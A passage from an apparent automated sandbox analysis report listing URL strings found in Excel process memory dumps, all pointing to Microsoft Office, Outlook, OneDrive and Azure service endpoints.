    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~9
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai%
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comed
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://directory.services.
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office?$
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~i$:?
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://management.azure.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/7
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech=9
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000002.608824531.0000000012F39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513076581.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456932989.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472613834.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471316055.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472235778.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.474334086.0000000012F33000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeap
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000000.00000002.608462358.0000000012D34000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comK
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com#VS:
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%WY;G
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/WW;F
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3WC;H
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com7VO:b
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9VE:a
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comCW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP6
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comQj
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comUi
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comWW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comYW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comaW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comgi
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comkWk;L
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comqh
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comuW
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE:
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.comQ%g;D
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/O
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesF
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comedu
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netf
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netm
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netz
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comiUrl;
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/0
